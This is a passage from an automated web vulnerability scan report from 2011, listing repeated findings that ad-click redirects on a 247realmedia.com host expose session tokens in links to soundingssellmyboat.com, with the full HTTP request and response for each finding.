Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:46:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.41. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/238495154/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/238495154/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/238495154/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:48:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.42. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/288726570/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/288726570/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/288726570/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:52 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.43. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/319855659/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/319855659/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/319855659/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:00:46 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.44. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/321743525/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/321743525/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/321743525/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.45. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/373221580/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/373221580/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/373221580/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:44:26 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.46. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/386017114/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/386017114/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/386017114/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:40:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.47. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/457264621/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/457264621/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/457264621/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:34 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.48. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/488972836/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/488972836/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/488972836/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:04:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.49. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/495614817/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/495614817/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/495614817/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.50. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/503116854/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/503116854/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/503116854/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:52:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.51. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/52813720/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/52813720/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/52813720/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:09:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.52. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/566136437/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/566136437/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/566136437/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:57 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.53. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/569370007/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/569370007/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/569370007/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:44:22 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.54. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/586884124/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/586884124/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/586884124/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:49:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
